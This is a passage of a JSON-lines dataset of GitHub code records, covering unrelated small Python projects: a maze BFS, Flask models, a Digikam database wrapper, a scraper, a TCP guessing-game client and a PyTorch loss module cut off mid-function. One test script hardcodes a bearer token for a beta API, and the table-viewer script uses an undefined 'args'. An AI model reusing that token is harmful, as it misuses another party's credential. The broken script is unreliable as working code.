\"PR\")\nprint(PR.__dict__)\nOllin.Add([\"METHANE\",\"ETHANE\",\"PROPANE\",\"ISOBUTANE\",\"N-BUTANE\",\"N-PENTANE\",\"N-HEXANE\",\"N-HEPTANE\",\"N-OCTANE\",\"N-NONANE\"\n ,\"N-DECANE\",\"N-UNDECENE\"],\"PR\")\nOllin.LoadConst()\nprint(\"####################### Calling of AddCase() #####################################\")\nthermo_obj_PR = Ollin.AddCase('PR')\nthermo_obj_PR.SetX([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\nthermo_obj_PR.T(322)\nthermo_obj_PR.P(1861)\nprint(\"################### Ollin PresureVap obj\")\nprint(PR.PresureVap)\nprint(\"#################### Calling Ollin().Solve()\")\nOllin.Solve()\nprint(\"#################### Calling Ollin().Resumen()\")\nOllin.Resumen()\n","repo_name":"psy007/NNPC-CHEMICAL-SIM-","sub_path":"ollin/Example/mycavett.py","file_name":"mycavett.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10774162120","text":"from sys import *\r\nfrom collections import * \r\nfrom heapq import * \r\nfrom functools import *\r\nfrom math import *\r\nfrom itertools import *\r\n\r\n\r\ninput = stdin.readline\r\n\r\n\r\ndx = [0,0,1,-1]\r\ndy = [1,-1,0,0]\r\n\r\nn,m = map(int,input().split())\r\n\r\n\r\nboard = [\"\" for _ in range(n)]\r\n\r\n\r\nfor i in range(n):\r\n board[i] = input()[:-1]\r\n\r\n\r\n\r\nvisit = [[0 for _ in range (m)] for _ in range(n)]\r\n\r\n\r\nvisit[0][0] = 1\r\nq = deque()\r\n\r\nq.append((0,0))\r\n\r\nwhile q:\r\n \r\n nowX,nowY = q.popleft()\r\n \r\n \r\n for i in range(4):\r\n \r\n nx = nowX + dx[i]\r\n ny = nowY + dy[i]\r\n \r\n if nx < 0 or nx >= n or ny < 0 or ny >= m or board[nx][ny] == \"0\" or visit[nx][ny] != 0:\r\n \r\n continue\r\n \r\n q.append((nx,ny))\r\n visit[nx][ny] = visit[nowX][nowY] + 1 \r\n \r\n\r\n\r\nprint(visit[n-1][m-1])\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"yongbeomkwak/BaekJoonHub","sub_path":"백준/Silver/2178. 
미로 탐색/미로 탐색.py","file_name":"미로 탐색.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"11652740336","text":"from shared_db import db\nimport os\n\n\ndef setup_db(app, database_uri=os.environ['DATABASE_URL']):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_uri\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n return db\n\n'''\nOwner\n'''\n\n\nclass Owner(db.Model):\n __tablename__ = 'owners'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n phone = db.Column(db.String, nullable=False)\n\n def __init__(self, name, phone):\n self.name = name\n self.phone = phone\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'phone': self.phone}\n\n\n'''\nPet\n'''\n\n\nclass Pet(db.Model):\n __tablename__ = 'pets'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n species = db.Column(db.String, nullable=False)\n breed = db.Column(db.String)\n\n def __init__(self, name, species, breed=\"\"):\n self.name = name\n self.species = species\n self.breed = breed\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'species': self.species,\n 'breed': self.breed}\n\n '''\n Appointment \n '''\n\n\nclass Appointment(db.Model):\n __tablename__ = 'appointments'\n\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(db.Integer, db.ForeignKey('owners.id'), nullable=False)\n pet_id = db.Column(db.Integer, db.ForeignKey('pets.id'), nullable=False)\n date = db.Column(db.String, nullable=False)\n time = db.Column(db.String, nullable=False)\n\n def __init__(self, date, time, pet_id, owner_id):\n self.date = date\n self.time = time\n self.pet_id = pet_id\n self.owner_id = owner_id\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'date': self.date,\n 'time': self.time,\n 'pet_id': self.pet_id,\n 'owner_id': self.owner_id}\n\n","repo_name":"EsNFish/fish-udacity-capstone","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23207239901","text":"#!/usr/bin/env python3\n\"\"\"HYPERPARAMETER\"\"\"\nimport numpy as np\n\n\ndef update_variables_Adam(alpha, beta1, beta2, epsilon, var, grad, v, s, t):\n \"\"\"updates a variable in place using the Adam optimization algorithm\"\"\"\n v = beta1 * v + (1 - beta1) * grad\n v_1 = v / (1-beta1**t)\n\n s = beta2*s + (1 - beta2) * grad ** 2\n s_1 = s / (1 - beta2 ** t)\n\n var = var - alpha * v_1 / (np.sqrt(s_1) + epsilon)\n return var, v, 
s\n","repo_name":"Immaannn2222/holbertonschool-machine_learning","sub_path":"supervised_learning/0x03-optimization/9-Adam.py","file_name":"9-Adam.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3927224349","text":"\"\"\"\nDefines the ``Digikam`` class for database access.\n\"\"\"\n\nimport logging\nimport os\nimport re\nfrom typing import Mapping, Optional, Union\n\nfrom sqlalchemy import text, create_engine\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.orm import Session, declarative_base\nfrom sqlalchemy.ext.declarative import DeferredReflection\n\nfrom .settings import Settings\nfrom .tags import Tags\nfrom .albumroots import AlbumRoots\nfrom .albums import Albums\nfrom .images import Images\nfrom .exceptions import DigikamError, DigikamConfigError\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Digikam:\n \"\"\"\n Connection to the Digikam database.\n \n This object connects to the Digikam database using the\n :doc:`SQLAlchemy ORM `. It generates its own set of\n classes so that you can use multiple ``Digikam`` objects to connect to\n different databases.\n \n When initializing a ``Digikam`` object, you have to supply parameters to\n specify the database. This is usually done with the ``database``\n parameter. It can be one of the following:\n \n The string **\"digikamrc\"**:\n Use the local Digikam application's database configuration in\n :file:`$HOME/.config/digikamrc`.\n Any other :class:`str`:\n Use the string as database URL in :func:`~sqlalchemy.create_engine`.\n A SQLAlchemy :class:`~sqlalchemy.engine.Engine` object:\n Use this object as the database engine\n \n Access to actual data is mostly done through the following properties:\n \n * images (class :class:`~digikamdb.images.Images`)\n * tags (class :class:`~digikamdb.tags.Tags`)\n * albums (class :class:`~digikamdb.albums.Albums`)\n * albumroots (class :class:`~digikamdb.albumroots.AlbumRoots`)\n * settings (class :class:`~digikamdb.settings.Settings`)\n \n Parameters:\n database: Digikam database.\n sql_echo: Sets the ``echo`` option of SQLAlchemy.\n root_override: Can be used to override the location of album roots\n in the file system. 
See `Root Overrides`_ for more\n information.\n \"\"\"\n \n def __init__(\n self,\n database: Union[str, Engine],\n root_override: Optional[Mapping] = None,\n sql_echo: bool = False\n ):\n \"\"\"\n Constructor\n \"\"\"\n if isinstance(database, Engine):\n log.info(\n 'Initializing Digikam object from %s',\n database\n )\n self._engine = database\n elif isinstance(database, str):\n if database == 'digikamrc':\n log.info('Initializing Digikam object from digikamrc')\n self._engine = Digikam.db_from_config(sql_echo = sql_echo)\n else:\n log.info(\n 'Initializing Digikam object from %s',\n re.sub(r':.*@', ':XXX@', database)\n )\n self._engine = create_engine(\n database,\n future = True,\n echo = sql_echo)\n else:\n raise TypeError('Database specification must be Engine or str')\n \n self._db_version = self._get_db_version()\n \n self._session = Session(self._engine, future = True)\n\n self._base = self._digikamobject_class(declarative_base())\n \n self._settings = Settings(self)\n self._tags = Tags(self)\n self._albumRoots = AlbumRoots(self, override = root_override)\n self._albums = Albums(self)\n self._images = Images(self)\n\n self.base.prepare(self._engine)\n self.tags.setup()\n \n _db_config_keys = dict(\n db_host = 'Database Hostname',\n db_name = 'Database Name',\n db_pass = 'Database Password',\n db_port = 'Database Port',\n db_type = 'Database Type',\n db_user = 'Database Username',\n db_internal = 'Internal Database Server'\n )\n \n def _get_db_version(self) -> int:\n with self._engine.connect() as conn:\n return int(\n conn.execute(text(\n \"SELECT value FROM Settings WHERE keyword = 'DBVersion'\"\n )).one().value\n )\n \n @property\n def db_version(self) -> int:\n \"\"\"\n The Digikam database version\n \n .. versionadded:: 0.2.2\n \"\"\"\n return self._db_version\n \n @property\n def has_tags_nested_sets(self) -> bool:\n \"\"\"\n Indicates if the ``Tags`` table has nested sets\n \n .. 
versionadded:: 0.2.2\n \"\"\"\n return self.is_mysql and self.db_version <= 10\n \n @property\n def base(self) -> type:\n \"\"\"Base class for table-mapped classes\"\"\"\n return self._base\n \n @classmethod\n def db_from_config(cls, sql_echo = False) -> Engine: # noqa: C901\n \"\"\"\n Creates the database connection from :file:`digikamrc`.\n \n Returns:\n Database connection object\n Raises:\n DigikamConfigError: ~/.config/digikamrc cannot be read\n or interpreted.\n \"\"\"\n try:\n configfile = os.path.join(os.path.expanduser('~'), '.config/digikamrc')\n config = None\n # configparser cannot process digikamrc, so we do it manually...\n with open(configfile, 'r') as cfg:\n for line in cfg.readlines():\n line = line.strip()\n \n if config is None:\n if line == '[Database Settings]':\n config = {}\n continue\n \n if line.startswith('['):\n break\n \n if '=' not in line:\n continue\n \n key, value = line.split('=', maxsplit=1)\n key, value = key.strip(), value.strip()\n \n for key1, key2 in cls._db_config_keys.items():\n if key == key2:\n config[key1] = value\n break\n \n except DigikamError: # pragma: no cover\n raise\n except Exception as e:\n raise DigikamConfigError('Error reading config file: ' + str(e))\n \n try:\n if config['db_type'] == 'QMYSQL':\n if 'db_internal' in config and config['db_internal'].lower() != 'false':\n raise DigikamConfigError('Internal Database Server is not supported')\n \n if 'db_port' in config:\n config['db_host'] = '%s:%s' % (\n config['db_host'],\n config['db_port']\n )\n db_str = 'mysql+pymysql://%s:%s@%s/%s?charset=utf8' % (\n config['db_user'],\n config['db_pass'],\n config['db_host'],\n config['db_name'],\n )\n log.debug(\n 'Using MySQL database %s',\n db_str.replace(config['db_pass'], 'XXX')\n )\n return create_engine(db_str, future = True, echo = sql_echo)\n \n elif config['db_type'] == 'QSQLITE':\n log.debug('Using SQLite database in %s', config['db_name'])\n return create_engine(\n 'sqlite:///%s' % (\n os.path.join(config['db_name'], 'digikam4.db')\n ),\n future = True,\n echo = sql_echo)\n \n else:\n raise DigikamConfigError('Unknown database type ' + config['db_type'])\n \n except DigikamError:\n raise\n except KeyError as e: # pragma: no cover\n if e.args[0] in cls._db_config_keys:\n raise DigikamConfigError(\n 'Configuration not found: ' + cls._db_config_keys[e.args[0]]\n )\n else:\n raise\n \n raise DigikamConfigError('Unknown Database Type ' + config['db_type'])\n \n def destroy(self):\n \"\"\"\n Clears the object.\n \n This will call :meth:`~sqlalchemy.orm.Session.close` and\n :meth:`~sqlalchemy.engine.Engine.dispose` for the session and engine\n objects.\n \"\"\"\n log.info('Scrapping Digikam object')\n self._settings = None\n self._tags = None\n self._albumRoots = None\n self._albums = None\n self._images = None\n self.session.close()\n self._session = None\n self._engine.dispose()\n self._engine = None\n \n @property\n def settings(self) -> Settings:\n \"\"\"The :class:`~digikamdb.settings.Settings` object\"\"\"\n return self._settings\n \n @property\n def tags(self) -> Tags:\n \"\"\"The :class:`~digikamdb.tags.Tags` object\"\"\"\n return self._tags\n \n @property\n def albumRoots(self) -> AlbumRoots:\n \"\"\"The :class:`~digikamdb.albumroots.AlbumRoots` object\"\"\"\n return self._albumRoots\n \n @property\n def albums(self) -> Albums:\n \"\"\"The :class:`~digikamdb.albums.Albums` object\"\"\"\n return self._albums\n \n @property\n def images(self) -> Images:\n \"\"\"The :class:`~digikamdb.images.Images` object\"\"\"\n return 
self._images\n \n @property\n def session(self) -> Session:\n \"\"\"The SQLAlchemy ORM session\"\"\"\n return self._session\n \n @property\n def is_mysql(self) -> bool:\n \"\"\"\n ``True`` if database is MySQL\n \"\"\"\n return (self._engine.dialect.name == 'mysql')\n \n def _digikamobject_class(self, base: type) -> type:\n \"\"\"\n Defines the DigikamObject class\n \n Args:\n base: parent class (generated with :func:`declarative_base`)\n Returns:\n Class that has the parents :class:`DeferredReflection` and *base*.\n \"\"\"\n class DigikamObject(DeferredReflection, base):\n \"\"\"\n Abstract base class for objects stored in database.\n Derived from :class:`~sqlalchemy.ext.declarative.DeferredReflection`\n and :func:`~sqlalchemy.orm.declarative_base`.\n \"\"\"\n __abstract__ = True\n __mapper_args__ = {\n 'column_prefix': '_',\n }\n \n _digikam = self\n \n @property\n def digikam(self) -> Digikam:\n \"\"\"The ``Digikam`` object\"\"\"\n return self._digikam\n \n return DigikamObject\n\n\n\n","repo_name":"rcw-2/python-digikamdb","sub_path":"digikamdb/conn.py","file_name":"conn.py","file_ext":"py","file_size_in_byte":10868,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"3582291168","text":"\"\"\"\nNON-CONTEXTUAL VIEW:\npython3 main_table_2d_view.py 90 100 > data_table_2d_view_90_100_$$.txt 2>&1\n\"\"\"\n\n# IMPORTS\nimport sys\nimport os\nimport argparse\nfrom pathlib import Path\nimport numpy as np\n\nfile = Path(__file__).resolve()\nsys.path.append(file.parents[0])\n\nimport table2d.table2dfonction as table2dfonction\n\n\n# PARAMETERS\nL = 6\nPID_INF = 40\nPID_INF = 50\n\nDATA = f\"{file.parents[2]}/MNHN_RESULT/1_DATA\"\nDATA_RESULT = f\"{file.parents[2]}/MNHN_RESULT/3_TABLE_2D\"\nNAME_FASTA_TRAIN_FOLDER = \"Pfam_split/Pfam_train\"\nNAME_PID_FOLDER = \"PID\"\nALPHABET = [\"A\", \"R\", \"N\", \"D\", \"C\", \"Q\", \"E\", \"G\", \"H\", \"I\",\n \"L\", \"K\", \"M\", \"F\", \"P\", \"S\", \"T\", \"W\", \"Y\", \"V\"]\nLIST_PSEUDO_COUNTER_2D = [0,\n pow(10, -5),\n pow(10, -4),\n pow(10, -3),\n pow(10, -2),\n pow(10, -1),\n 1,\n 10]\n\n\n\n\n# PROGRAM\n\npath_folder_fasta = f\"{DATA}/{NAME_FASTA_TRAIN_FOLDER}\"\npath_folder_pid = f\"{DATA}/{NAME_PID_FOLDER}\"\npath_res = f\"{DATA_RESULT}/{args.pid_inf}_{args.pid_sup}\"\npath_res_graph = f\"{path_res}/graph\"\nif not os.path.exists(path_res_graph):\n os.makedirs(path_res_graph)\n\n# table_2d score (BLOSUM formula)\nprint(f\"\\ntable_2d_score ({args.pid_inf},{args.pid_sup}) :\\n\")\ntable_2d_score = np.load(f\"{path_res}/score.npy\", allow_pickle='TRUE').item()\ntable2dfonction.table_2d_visualisation(table_2d_score)\nname_folder_fasta = os.path.basename(path_folder_fasta)\ntitle_heatmap = f\"Heatmap de la table_2d de scores [{args.pid_inf},{args.pid_sup}] calculée sur {name_folder_fasta}\"\ntable2dfonction.table_2d_heatmap(table_2d_score, path_res_graph, title_heatmap, size_annot = 5)\n\n\n# table_2d score comparison with BLOSUM_62\nPID_INF_REF = 62\nmatrix_diff, PID_INF_REF, average_diff = table2dfonction.table_2d_difference(\n table_2d_score,\n ALPHABET,\n PID_INF_REF)\ntitle_heatmap = f\"Heatmap des différences entre la table_2d de scores [{args.pid_inf},{args.pid_sup}] et la Blosum_{PID_INF_REF} de référence\\nLa différence moyenne de score est de : {average_diff}\"\ntable2dfonction.table_2d_heatmap(matrix_diff, path_res_graph, title_heatmap, size_annot = 5)\n\n\n# table_2d probability\nfor pseudo_counter_2d in LIST_PSEUDO_COUNTER_2D:\n table_2d_proba = 
np.load(f\"{path_res}/proba_{pseudo_counter_2d}.npy\", allow_pickle='TRUE').item()\n table2dfonction.table_2d_visualisation(table_2d_proba)\n table2dfonction.sum_line(table_2d_proba)\n title_heatmap = f\"Heatmap de la table_2d de probabilités conditionnelles [{args.pid_inf},{args.pid_sup}] calculée sur {name_folder_fasta}\\n pseudo_counter_2d: {pseudo_counter_2d}\"\n table2dfonction.table_2d_heatmap(table_2d_proba, path_res_graph, title_heatmap, size_annot = 3)\n","repo_name":"PaulineTurk/MNHN","sub_path":"POUBELLE/main_table_2d_view.py","file_name":"main_table_2d_view.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71312710325","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\n\ncsv_file = open(\"SBS.csv\", \"w\")\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow([\"Period\", \"Ranking\", \"Program\", \"Rate\"])\n\nfor year in range(2010, 2019):\n for month in range(1, 13):\n for weekIndex in range(0, 5):\n response = requests.get(f\"https://workey.codeit.kr/ratings/index?year={year}&month={month}&weekIndex={weekIndex}\")\n pageCode = response.text\n soup = BeautifulSoup(pageCode, \"html.parser\")\n\n for td_tag in soup.select(\"tr\")[1:]:\n if td_tag.select_one(\".channel\").get_text() == \"SBS\":\n period = f\"Year {year} Month {month} Week {weekIndex +1}\"\n row = [\n period,\n td_tag.select_one(\".rank\").get_text(),\n td_tag.select_one(\".program\").get_text(),\n td_tag.select_one(\".percent\").get_text(),\n ]\n csv_writer.writerow(row)\n else:\n pass\n\ncsv_file.close()\n","repo_name":"hipsans/WebAuto","sub_path":"venv/SBS.py","file_name":"SBS.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40624333540","text":"from flask import Flask, request, url_for\nfrom tasks import add_task\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n name = request.args.get(\"name\", \"World\")\n return f\"Hello {name}\"\n\n\n@app.route(\"/add//\")\ndef add(a, b):\n result = add_task.delay(a, b)\n return f\"task: {result.id}\"\n\n\n@app.route(\"/get/\")\ndef get(key):\n result = add_task.AsyncResult(key)\n if result.status == \"SUCCESS\":\n return f\"result: {result.get()}\"\n else:\n return f\"status: {result.status}\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"blakelockley/flask-celery","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19087260037","text":"# \n# Works with Python3\n#\n# Modified by: Ryan Sowers\n# 03/06/2018\n#\n# Step 3: Enhance the server code further to support game logic and starting of new game.\n# Final product.\n#\n# Run: python3 Sowers_TCPclientP3.py IP\n#\n\nimport socket\nimport sys\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nif len(sys.argv) < 2:\n print (\"Please provide , e.g., localhost on the command line!\")\n exit(1)\n\n# Connect the socket to the port on the server given by the caller\nserver_address = (sys.argv[1], 10000)\t\t# socket id\nprint(\"connecting to %s port %s\" % server_address)\nsock.connect(server_address)\t\t\t\t# connect to socket\n\ntry:\n \n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive \"Welcome to...\"\n\n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive 
\"Please guess...\"\n\n\t\n\twhile True:\n\t\ttry:\n\t\t\tnumber = int(input(\"Guess: \"))\t\t\t# verify input to be integer and not other string\n\t\texcept ValueError:\n\t\t\tprint(\"That's not a number.\")\n\t\t\tprint(\"Please choose a number between 1 and 100.\")\n\t\telse:\n\t\t\tbreak\n\n\twhile ((number < 1) or (number > 100)):\t\t\t# verify input to be in desired range\n\t\tprint(\"Please choose a number between 1 and 100.\")\n\t\ttry:\n\t\t\tnumber = int(input(\"Guess: \"))\n\t\texcept ValueError:\n\t\t\tprint(\"That's not a number.\")\n\n\tnumber = str(number)\t\t\t\t\t\t\t# convert back to string because that's what we're encoding as\n\tprint(\"Sending your guess: %s\" % number)\n\tsock.sendall(bytes(number, 'utf-8'))\t\t\t# send guess. tried: sock.sendall(bytes(number)) to send int\n\n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive \"You guessed...\" game ending message\n\nfinally:\n sock.close()\n","repo_name":"ryandsowers/NetworkGame","sub_path":"Sowers_TCPclientP3.py","file_name":"Sowers_TCPclientP3.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35387670263","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 18:03:47 2020\n\n@author: ajay\n\"\"\"\n\n'''\nLoad data from csv into pandas, viz using seaborn\n'''\n\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Load csv data\ndf = pd.read_csv('./trainData.csv')\n\n#Split labels and data\nlabels = np.array(df.pop('y'))\nx = np.array(df.pop('x'))\n\n#Split data into corresponding labels\nx_1 = x[labels==1]\nx_2 = x[labels==2]\n\n#Plot distributions of data\nplt.figure()\nsns.kdeplot(x_1)\nsns.kdeplot(x_2)\n\nplt.figure()\nsns.kdeplot(x_1,x_2)","repo_name":"ajaynr/geneticAlgo","sub_path":"vizData.py","file_name":"vizData.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36781792278","text":"import numpy as np\nimport h5py\nimport dask.array as da\n\nfilename = '/Users/pbw/data/sample_A/sample_A_20160501.hdf'\nsource_data = h5py.File(filename, 'r')\nraw = np.asarray(source_data['volumes/raw'])\nlabels = np.asarray(source_data['volumes/labels/neuron_ids'])\n\nraw_dask = da.from_array(raw, chunks=(1, 1250, 1250))\nda.to_zarr(raw_dask, 'raw.zarr')\nlabels_dask = da.from_array(labels, chunks=(1, 1250, 1250))\nda.to_zarr(labels_dask, 'labels.zarr')\n","repo_name":"pwinston/napari-pwinston","sub_path":"cremi-hdf2zarr.py","file_name":"cremi-hdf2zarr.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40537707400","text":"import requests\nimport unittest\nimport json\n\nclass get_listAll(object):\n def __init__(self):\n self.url = 'https://beta.fengjr.com/fengInfo/api/v2/common/getListAll'\n self.headers = {\n 'Authorization': \"Bearer Rxp1GxIn2VC27ylFIdy3Sh4WNMVSslm38AjNHB7vPhj0oLnRMiiirC73wbXG7o9x\"\n }\n self.params = {\n \"category_type\": \"16\",\n \"page_size\": \"10\",\n \"user_id\": \"22B52EA7-5D85-44BF-8E89-96D3F43E2597\",\n \"version\": \"2.0\"}\n def test01(self):\n self.response = requests.get(url=self.url,headers=self.headers,params=self.params)\n \n\nif __name__ == '__main__':\n obj = get_listAll()\n 
obj.test01()\n","repo_name":"iliun/apiStudy","sub_path":"study/jk01.py","file_name":"jk01.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20889013965","text":"\"\"\"\n.. module:: fixbatch.py\n\nfixbatch.py\n******\n\n:Description: fixbatch.py\n\n Different Auxiliary functions used for different purposes\n\n:Authors:\n bejar\n\n:Version: \n\n:Date: 26/08/2021\n\"\"\"\n\n__author__ = 'bejar'\n\n\nimport argparse\nimport json\nimport glob\nimport os\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch', type=int, help='batchsize')\n\n args = parser.parse_args()\n files = glob.glob('*.work')\n\n for f in files:\n fp = open(f, 'r')\n\n s = ''\n\n for l in fp:\n s += l\n\n config = json.loads(s)\n\n config['training']['batch'] = args.batch\n\n sconf = json.dumps(config, indent=4, sort_keys=True)\n\n fconf = open(f.replace(\".work\", \".json\"), 'w')\n fconf.write(sconf + '\\n')\n fconf.close()\n\n os.remove(f)","repo_name":"bejar/Wind","sub_path":"Scripts/fix/fixbatch.py","file_name":"fixbatch.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"240571357","text":"\"\"\"Plot the dependencies of ams.\"\"\"\n\nimport os\nimport subprocess\nimport ams\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nmodule_to_exclude = \"ams ams.main ams.system ams.core ams.utils numpy\"\nams_root = ams.utils.paths.ams_root()\npypower_path = os.path.join(ams_root, 'solver/pypower')\nfigfolder_path = os.path.normpath(os.path.join(ams_root, '../dev/notes/fig'))\n\nmodule_to_dps = [\"opf\", \"runopf\", \"opf_setup\", \"opf_model\", \"opf_execute\", \"pipsopf_solver\"]\n\nfor module_name in module_to_dps:\n fig_path = os.path.join(figfolder_path, module_name + '.svg')\n file_path = os.path.join(pypower_path, module_name + '.py')\n if os.path.exists(fig_path):\n logger.warning(f\"Figure {fig_path} already exists. Skipping...\")\n else:\n logger.warning(f\"Plotting dependencies of {module_name}...\")\n cmd = f\"pydeps {file_path} -o {fig_path} --exclude-exact {module_to_exclude} --rmprefix 'ams.solver.pypower.'\"\n subprocess.run(cmd, shell=True)\n logger.warning(f\"Done. 
Figure saved to {fig_path}.\")\n","repo_name":"CURENT/ams","sub_path":"dev/notes/fig/plot_deps.py","file_name":"plot_deps.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"23690549578","text":"# rename this file \"loss_block.py\"\n\n\"\"\" \nCreate the network to disentangle dynamic attributes from static information\n \"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# local import\nfrom .utils import share_encoding_mean,share_encoding_mean_check\n\nclass DenoisingLossDDP(nn.Module):\n\n def __init__(self,hyperparams, num_transforms, batch_size,\n img_loss_type='l2',enc_loss_type='simclr'):\n super(DenoisingLossDDP, self).__init__()\n self.hyperparams = hyperparams\n self.similarity_f = nn.CosineSimilarity(dim=2)\n self.criterion = nn.CrossEntropyLoss(reduction=\"sum\")\n\n self.num_transforms = num_transforms\n self.batch_size = batch_size\n\n msizes = [2,self.num_transforms,self.num_transforms+1]\n self.masks_neg,self.masks_pos = self.get_masks(msizes,batch_size)\n self.img_loss_type = img_loss_type\n self.enc_loss_type = enc_loss_type\n \n\n def forward(self,pic_set,dec_pics,h):\n hyperparams = self.hyperparams\n simh = []\n simpics = []\n\n N = len(pic_set)\n BS = pic_set[0].shape[0]\n pshape = pic_set[0][0].shape\n shape = (N,BS,) + pshape\n\n # h = h.reshape(N,BS,-1)\n # loss_h = self.compute_enc_loss(h)\n\n # ----------------------\n # -- pair-wise losses --\n # ----------------------\n pic_set = pic_set.reshape(N,BS,-1)\n dec_pics = dec_pics.reshape(N,BS,-1)\n\n # # -- roll the decoded pics --\n\n # # r = torch.cat([dec_pics[-1:],dec_pics[:-1]])\n # # pic_pair = [pic_set,r]\n\n offset_idx = [(i+1)%N for i in range(N)]\n pic_pair = [pic_set,dec_pics[offset_idx]]\n loss_pairs = self.compute_img_loss(pic_pair)\n\n # pic_set = pic_set.reshape(N*BS,-1)\n # dec_pics = dec_pics.reshape(N*BS,-1)\n # pic_pair = [pic_set,dec_pics]\n\n loss_pairs = self.compute_img_loss(pic_pair)\n\n\n # -- across decoded pics --\n # dec_pics = [dec_pic for dec_pic in dec_pics]\n # loss_x = self.compute_img_loss(dec_pics)\n # + hyperparams.x * loss_x\n\n loss = loss_pairs #+ hyperparams.h * loss_h\n return loss\n \n def aggregate(self,h,aux,N,BS):\n agg_fxn = self._agg_fxn\n agg_type = self._agg_type\n if agg_fxn == 'mean':\n return share_encoding_mean(agg_type,h,aux,N,BS)\n elif agg_fxn == 'id':\n return h,aux\n else:\n raise ValueError(f\"Uknown aggregation function [{agg_fxn}]\")\n\n def compute_img_loss(self,sim_i):\n if self.img_loss_type == 'simclr':\n return self.compute_loss_simclr(sim_i)\n elif self.img_loss_type == 'l2':\n return F.mse_loss(sim_i[0],sim_i[1])\n else:\n raise ValueError(f\"Unknown img loss type [{self.img_loss_type}]\")\n \n def compute_enc_loss(self,sim_i):\n if self.enc_loss_type == 'simclr':\n return self.compute_loss_simclr(sim_i)\n elif self.enc_loss_type == 'l2':\n return F.mse_loss(sim_i[0],sim_i[1])\n else:\n raise ValueError(f\"Unknown loss type [{self.enc_loss_type}]\")\n\n def compute_loss_simclr(self,sim_i):\n N = len(sim_i)\n BS = self.batch_size\n Kpos = N*(N-1)*BS\n Kneg = N * BS\n mask_pos = self.masks_pos[N]\n mask_neg = self.masks_neg[N]\n return self.generalized_nt_xent(sim_i,N,BS,Kpos,Kneg,mask_pos,mask_neg)\n\n\n def generalized_nt_xent(self,sim_i,N,BS,Kpos,Kneg,mask_pos,mask_neg):\n \"\"\"\n sim_i [ NumTransforms x BatchSize x EncoderD]\n \"\"\"\n temperature = self.hyperparams.temperature\n\n # compute 
